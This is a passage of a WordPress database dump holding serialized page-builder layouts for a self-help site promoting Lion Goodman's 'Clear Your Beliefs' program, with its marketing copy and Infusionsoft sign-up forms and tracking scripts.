Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1147, 1629, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2738:"<div id="divStroke">\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my belief so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1148, 1630, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -108px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:804:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:785:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg"></div>\n<p style="text-align: center; margin-top: 37px; font-size: 18px;"> <big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 37px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 30px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1569:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<p style="font-size: 1.1em; margin-left: 10px; margin-bottom: -23px !important;"><b>The <em>Clear Your Beliefs</em> Program… and  How and Why…</b></p>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 18px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<p style="margin-left: 10px; margin-bottom: 14px !important;"><b>How and Why It Works So Well</b></p>\n\n<ul style="margin-left: 18px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:2822:"<div id="divStroke"><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1149, 588, 'panels_data', 'a:0:{}'),
(1150, 107, 'panels_data', 'a:0:{}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1379, 1823, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:88:"[su_posts template="templates/single-post.php" post_type="attachment" post_status="any"]";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1177:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because 